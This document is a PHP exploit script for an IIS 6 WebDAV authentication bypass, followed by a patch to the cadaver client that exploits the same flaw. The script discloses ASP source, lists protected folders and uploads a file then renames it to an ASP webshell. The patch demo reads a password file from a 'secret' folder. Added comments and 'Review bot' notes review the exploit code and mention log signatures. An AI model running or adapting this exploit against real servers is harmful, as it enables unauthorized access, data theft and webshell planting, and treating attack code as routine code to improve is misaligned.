
<?

// Usage banner. The script name is spliced in from $argv[0]; everything else is static text.
print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

// Initial argument validation (the original comment here was French: "verification du debut").
// Note: $argv[1], $argv[2] and $argv[3] are read without checking that they exist, so a short
// command line raises undefined-index notices before any of the messages below is printed.
// The comparisons are loose (!=) string comparisons against three fixed action names.
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

// The host is later passed to gethostbyname() as a bare name (see sent()), so a value that
// still carries an "http://" prefix is rejected. stristr() makes this check case-insensitive.
if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

// The request path must contain at least one "/": each action branch below locates the
// last "/" with strrpos() and edits the path around it.
if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
// Send one raw HTTP request and capture the whole response.
//
// $sock  - despite its name, this is the complete request text (headers and body) to write
//          to the connection; the socket itself is the local $ock.
// Globals: reads $host; overwrites $html with the full response (status line, headers, body).
// No return value. On connection failure it prints a message and terminates the script.
//
// Caveats visible here: fsockopen() is called without a timeout and without the errno/errstr
// out-parameters, so failures are not distinguished; the read loop runs until EOF, so it
// relies on the caller having asked the server to close the connection after the response.
function sent($sock)  
{  
global  $host, $html;  
// Resolve the host name first and connect to TCP port 80 (plain HTTP only).
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
// Reset the shared accumulator, then read the response line by line until the peer closes.
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

// --- action "source" -------------------------------------------------------------------
// Replaces the last "/" of the path with the byte sequence "%c0%af/" (an overlong UTF-8
// encoding of "/") and issues a GET with a "Translate: f" header; the raw response is echoed.
// From the server side, a URI containing "%c0%af" together with a "Translate: f" header is
// the distinguishing signature of this request and is what a log search or filter rule keys on.
if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    // Connection:close is what lets sent() read to EOF.
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
// --- action "path" ---------------------------------------------------------------------
// Inserts "%c0%af" immediately before the last "/" of the path and sends a PROPFIND.
// The request declares "Content-Length: 0" even though an XML propfind body follows the
// blank line; the two do not agree. The response is then split on "<a:href>" and the text
// up to the next "<" of each fragment is printed, i.e. the href values of the listing.
// $resultat is appended to with .= before it is ever initialised (undefined-variable notice).
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
// --- action "put" ----------------------------------------------------------------------
// Reads the local file "test.txt" (the name is hard-coded; the fourth CLI argument shown in
// the usage text is never consulted), uploads it with PUT under the fixed remote name
// "test.txt", waits two seconds, then issues a MOVE whose Destination renames it to
// "racle.asp". In server logs this appears as a PUT followed shortly by a MOVE that changes
// the extension of the same resource to an executable one — a sequence worth alerting on.
// If test.txt cannot be opened the script exits silently (the else branch below).
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    // The outgoing request is printed before it is sent; the response is not shown.
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
 else{die;}
 }


A blog post with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
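Review bot: The `switch` that ends just above line 152 still assigns `value` (the visible case sets it to "infinity"), but the replacement line 156 passes the literal "1" instead, so `value` and the whole switch are now dead code. Either remove the switch and the variable, or make the override explicit so a later reader does not "fix" it back: `ne_add_request_header(req, "Depth", "1"); /* depth argument deliberately ignored */`. The enclosing function starts outside the hunk.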
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
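Review bot: The `Translate: f` header added at line 166 is appended after the closing brace of the TE/Connection block, so it is sent on every request the patched client builds, not only on the WebDAV methods the patch is aimed at, and nothing in the hunk records that this is intended. A comment such as `/* Appended to every request, regardless of method */` would make the scope explicit; this also means every request from this build carries a header that does not appear in the unpatched neon code, which is a reliable fingerprint in server-side logs. The enclosing function begins outside the hunk.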
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
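Review bot: `path2` is a heap buffer from `ne_calloc` (line 173 of the previous hunk), but line 182 reassigns the pointer to `path` on the short-path branch, leaking the allocation and discarding the `const` of the parameter, and on the long-path branch its contents are copied by `ne_concat`/`ne_strdup` at lines 188-193 and the buffer is never freed either. The allocation (`strlen(path)+7`) is sized correctly for the six inserted bytes plus the terminator; only the ownership is wrong. ne_request_create continues past the end of the hunk, so any release would have to be placed after the last use of `path2` there.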
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
